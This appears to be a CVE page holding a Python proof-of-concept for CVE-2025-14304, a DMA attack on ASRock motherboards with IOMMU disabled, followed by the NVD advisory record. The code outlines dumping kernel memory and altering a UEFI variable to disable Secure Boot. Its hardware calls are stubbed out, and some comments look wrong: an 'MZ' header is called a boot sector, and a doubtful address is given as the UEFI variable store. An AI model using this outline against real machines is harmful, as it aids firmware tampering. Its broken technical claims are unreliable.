CVE-2025-14304

# CVE-2025-14304 PoC - DMA Memory Dump via PCIe Device # This PoC demonstrates DMA-based memory access when IOMMU is disabled # Requires a DMA-capable PCIe device (e.g., FPGA development board, PCIe hardware Trojan) import struct import ctypes # Define DMA access parameters DMA_CONTROL_REG = 0x0000 DMA_SRC_ADDR_REG = 0x0010 DMA_DST_ADDR_REG = 0x0018 DMA_SIZE_REG = 0x0020 DMA_CMD_START = 0x00000001 DMA_CMD_STOP = 0x00000002 class DMADevice: def __init__(self, pci_addr): self.pci_addr = pci_addr self.handle = None def connect(self): """Connect to DMA-capable PCIe device""" # In real attack, this would open PCIe device handle # self.handle = open_pcie_device(self.pci_addr) print(f"[*] Connecting to DMA device at {self.pci_addr}") return True def dma_read_physical(self, phys_addr, size): """ Read physical memory via DMA Args: phys_addr: Physical memory address to read size: Number of bytes to read Returns: bytes: Data read from physical memory """ # Configure DMA transfer config = struct.pack('<QQI', phys_addr, # Source: physical memory address 0x100000, # Destination: internal buffer size # Transfer size ) # Write DMA configuration to device registers # self.handle.write(DMA_SRC_ADDR_REG, phys_addr) # self.handle.write(DMA_DST_ADDR_REG, internal_buffer) # self.handle.write(DMA_SIZE_REG, size) # Start DMA transfer # self.handle.write(DMA_CONTROL_REG, DMA_CMD_START) # Wait for completion # while not self.handle.read(DMA_STATUS_REG) & DMA_COMPLETE: # pass print(f"[+] DMA Read: 0x{phys_addr:016x} ({size} bytes)") return b'\x00' * size # Placeholder for actual data def dma_write_physical(self, phys_addr, data): """ Write data to physical memory via DMA Args: phys_addr: Physical memory address to write data: Data to write """ # Configure reverse DMA transfer # self.handle.write(DMA_SRC_ADDR_REG, data_buffer) # self.handle.write(DMA_DST_ADDR_REG, phys_addr) # self.handle.write(DMA_SIZE_REG, len(data)) # self.handle.write(DMA_CONTROL_REG, DMA_CMD_START) print(f"[+] DMA Write: 0x{phys_addr:016x} ({len(data)} bytes)") return True def exploit_uefi_variable(phys_addr): """Example: Modify UEFI variable in memory""" device = DMADevice("0000:01:00.0") if device.connect(): # Read current UEFI variable data = device.dma_read_physical(phys_addr, 64) print(f"[*] Current variable: {data.hex()}") # Modify variable (e.g., disable Secure Boot) modified = bytearray(data) modified[0] = 0x00 # Disable flag device.dma_write_physical(phys_addr, bytes(modified)) print("[+] UEFI variable modified successfully") def dump_kernel_memory(): """Example: Dump kernel memory before OS security loads""" device = DMADevice("0000:01:00.0") if device.connect(): # Read first 1MB of physical memory (contains boot sector, kernel) for offset in range(0, 0x100000, 0x1000): data = device.dma_read_physical(offset, 0x1000) if b'MZ' in data: # Windows PE signature print(f"[*] Found boot sector at 0x{offset:016x}") return data if __name__ == "__main__": print("[*] CVE-2025-14304 PoC - IOMMU Bypass via DMA") print("[*] Target: ASRock/ASRockRack/ASRockInd motherboards with IOMMU disabled") # Uncomment to run: # dump_kernel_memory() # exploit_uefi_variable(0xFED40000) # UEFI variable store

{"cve": {"id": "CVE-2025-14304", "sourceIdentifier": "[email protected]", "published": "2025-12-17T04:15:44.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Certain motherboard models developed by ASRock and its subsidiaries, ASRockRack and ASRockInd. has a Protection Mechanism Failure vulnerability. Because IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-693"}]}], "references": [{"url": "https://www.asrock.com/support/Security.asp", "source": "[email protected]"}, {"url": "https://www.asrockind.com/zh-tw/security-center", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/en/cp-139-10579-9205b-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10578-c43b4-1.html", "source": "[email protected]"}]}}